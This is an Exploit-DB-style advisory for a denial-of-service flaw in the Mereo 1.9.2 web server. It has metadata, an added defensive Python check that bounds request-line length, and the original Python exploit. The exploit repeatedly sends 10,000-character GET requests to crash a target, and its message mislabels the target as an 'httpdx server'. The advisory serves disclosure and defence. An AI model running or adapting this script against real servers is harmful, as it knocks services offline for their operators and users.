Vendor: Mereo
By: CwG GeNiuS
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: Mereo
Affected Version From: 1.9.2
Affected Version To: 1.9.2
Patch Exists: YES
Related CWE: N/A
CPE: mereo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Mereo v1.9.2 Remote HTTP Server DoS (0day)

Mereo v1.9.2 is vulnerable to a remote denial of service. An attacker can crash the server by sending a specially crafted HTTP request whose request line is padded with a large number of 'X' characters (the proof of concept below uses 10,000). This vulnerability affects Mereo v1.9.2 and earlier versions.

Mitigation:

Upgrade to the latest version of Mereo.
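
For servers that cannot be upgraded right away, or for a front-end filter placed before them, the following added example (not part of the original advisory and not Mereo's code) shows a bounded request-line check that answers an oversized request with 414 instead of buffering it. The function name `check_request_line` and both size limits are assumptions chosen for illustration.

```python
import io

MAX_REQUEST_LINE = 8190  # assumed cap on the whole request line, in bytes
MAX_TARGET = 2048        # assumed cap on the request target alone


def check_request_line(stream, max_line=MAX_REQUEST_LINE, max_target=MAX_TARGET):
    """Read one request line with a hard size bound and classify it.

    Returns (status, reason): 200 means the line may be passed to the rest
    of the parser; otherwise send that status and close the connection.
    """
    # readline(n) returns at most n bytes, so an oversized line is cut off
    # here instead of growing a buffer to whatever the client sends.
    line = stream.readline(max_line + 1)
    if not line:
        return 400, "empty request"
    if len(line) > max_line:
        return 414, "request line exceeds %d bytes" % max_line
    if not line.endswith(b"\n"):
        return 400, "incomplete request line"
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return 400, "malformed request line"
    target = parts[1]
    if len(target) > max_target:
        return 414, "request target is %d bytes" % len(target)
    return 200, "ok"


if __name__ == "__main__":
    # Constructed inputs: an ordinary request, then request lines with the
    # same shape as the oversized one described in the advisory.
    samples = [
        b"GET /index.html HTTP/1.1\r\n\r\n",
        b"GET /" + b"X" * 3000 + b" HTTP/1.1\r\n\r\n",
        b"GET /" + b"X" * 10000 + b" HTTP/1.1\r\n\r\n",
    ]
    for raw in samples:
        stream = io.BytesIO(raw)
        status, reason = check_request_line(stream)
        print(status, reason, "(consumed %d of %d bytes)" % (stream.tell(), len(raw)))
```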

Exploit-DB raw data:

#!/usr/bin/python

###########################################################################
#
# Title:    Mereo v1.9.2 Remote HTTP Server DoS (0day)
# By:       CwG GeNiuS
# Email:    cwggenius [at] gmail [dot] com
# Tested:   XPSP3
# Download: http://www.ohloh.net/p/mereo
#
############################################################################


import socket, sys

# Request line: GET with a 10,000-character target
payload = "GET /"
payload += "X" * 10000
payload += " HTTP/1.1\r\n\r\n"
count = 1

try:
    while (count < 100):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.")
        s.connect((sys.argv[1], 80))
        print ("\n[*] Sending command.\n")
        s.send(payload)
        s.close()
        count = count + 1
        print count
except:
    # Any exception, including a refused connection once the server
    # stops answering, ends the loop here
    print "Successfully Crashed!"